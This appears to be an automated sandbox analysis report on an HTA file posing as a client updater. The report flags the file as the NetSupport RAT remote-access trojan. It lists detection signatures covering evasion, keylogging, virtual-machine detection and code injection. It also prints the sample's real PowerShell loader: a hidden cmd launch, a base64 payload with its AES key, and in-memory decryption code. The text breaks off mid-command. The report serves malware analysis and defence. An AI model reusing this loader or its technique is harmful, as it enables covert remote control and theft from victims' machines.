Windows Analysis Report
Client_version(updater).hta
Overview
General Information
Detection
NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell drops NetSupport RAT client
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Very long command line found
Suspicious powershell command line found
Suspicious command line found
Powershell drops PE file
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Yara detected NetSupport remote tool
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Enables security privileges
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- mshta.exe (PID: 7016 cmdline: mshta.exe "C:\Users\user\Desktop\Client_version(updater).hta" MD5: 7083239CE743FDB68DFC933B7308E80A)
- powershell.exe (PID: 5372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX